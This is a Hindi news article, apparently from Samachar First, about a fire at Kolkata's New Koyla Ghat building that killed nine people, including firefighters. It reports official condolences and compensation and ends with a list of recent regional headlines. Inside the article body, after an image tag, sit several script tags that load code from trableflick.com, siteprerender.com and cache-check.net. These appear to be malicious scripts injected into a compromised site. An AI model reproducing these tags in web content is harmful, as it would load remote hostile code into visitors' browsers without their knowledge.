Categories: इंडिया

कोलकाताः न्यू कोयला घाट बिल्डिंग की 13वीं मंजिल में लगी भीषण आग, 9 की मौत

<p>कोलकाता में एक भीषण अग्निकांड सामने आया है। यहां स्ट्रैंड रोड पर सोमवार की शाम न्यू कोयला घाट बिल्डिंग की 13वीं मंजिल पर आग लग गई। इस घटना में 9 लोगों की मौत हो गई है। बताया जा रहा है कि मरने वालों में 4 दमकल कर्मी, एक रेलवे पुलिस कर्मी, एक एएसआई और एक अन्य व्यक्ति शामिल हैं। इस बिल्डिंग में ईस्टर्न रेलवे का कार्यालय है। हालांकि अब आग पर काबू पा लिया गया है। वहीं, इस हादसे पर राष्ट्रपति रामनाथ कोविंद, प्रधानमंत्री नरेंद्र मोदी समेत कई दिग्गजों ने दुख जताया है।</p>

<p>प्रधानमंत्री नरेंद्र मोदी ने इस हादसे पर दुख जताया है। साथ ही प्रधानमंत्री मोदी ने को हादसे में जान गंवाने वाले लोगों के परिजनों को 2 लाख और गंभीर रूप से घायलों को PMNRF से 50 हजार रुपये की मदद देने की घोषणा की है। इसके अलावा केंद्रीय रेल मंत्री पीयूष गोयल ने इस घटना पर शोक प्रकट करते हुए कहा कि इस हादसे में चार दमकल कर्मचारी, दो रेलवे अधिकारी, एक एएसआई समेत नौ लोगों की मौत हो गई है।</p>

<p>उधर, घटना स्थल पर पहुंचीं पश्चिम बंगाल की मुख्यमंत्री ममता बनर्जी ने कहा कि यह बहुत दुखद है। मृतकों के परिजनों को 10-10 लाख रुपये की अनुग्रह राशि दी जाएगी और परिवार के एक सदस्य को नौकरी दी जाएगी। राष्ट्रपति रामनाथ कोविंद ने कोलकाता में आग लगने की घटना पर दुख जताते हुए जान गंवाने वाले लोगों के परिजनों के प्रति अपनी संवेदनाएं व्यक्त की और घायलों के जल्द ठीक होने की कामना की।</p>

<p><img src=”/media/gallery/images/image(2484).png” style=”height:110px; width:900px” /></p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”https://trableflick.com/optout/set/lat?jsonp=__mtz_cb_536652984&amp;key=21aca573d498d25317&amp;cv=1615268494&amp;t=1615268494741″ type=”text/javascript”></script>
<script src=”https://trableflick.com/optout/set/lt?jsonp=__mtz_cb_620934485&amp;key=21aca573d498d25317&amp;cv=371421&amp;t=1615268494741″ type=”text/javascript”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1615268494744″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

स्वच्छ रहेगा घर, नगर व पंचायत तभी तो स्वस्थ रहेगा इंसान: उषा बिरला

  Hamirpur: ग्राम पंचायत दडूही में सोमवार को स्वच्छ भारत मिशन के तहत स्वच्छता पखवाड़ा…

19 mins ago

शहीदों को नमन, शहीद स्मारक पर दी गई श्रद्धांजलि

  Mandi: भूतपूर्व सैनिक लीग मंडी द्वारा सोमवार को मंडी के शहीद स्मारक में 1965…

33 mins ago

आरक्षण पर कुठाराघात, केंद्र सरकार पर प्रेम कौशल का निशाना

  Hamirpur: हिमाचल प्रदेश कांग्रेस के मुख्य प्रवक्ता प्रेम कौशल ने कहा कि दलित वर्ग…

40 mins ago

मंडी में हिमाचल ग्रामीण बैंक कर्मचारियों का विरोध प्रदर्शन, मांगों को लेकर गरजे

  Mandi: हिमाचल ग्रामीण बैंक कर्मचारियों द्वारा विभिन्न मांगों को लेकर सोमवार को हिमाचल प्रदेश…

45 mins ago

कांगड़ा बनेगा वल्चर सेफ जोन, गिद्धों के संरक्षण की पहल

Hamirpur: कांगड़ा जिले में गिद्धों के 506 नए घोंसले मिलने के बाद इसे वल्चर सेफ…

56 mins ago

विक्रमादित्य की चेतावनी: कंगना माफी मांगें, वरना मानहानि का सामना करें

  Shimla: मंडी से सांसद कंगना रनौत के बयान पर मंत्री विक्रमादित्य सिंह पलटवार किया…

4 hours ago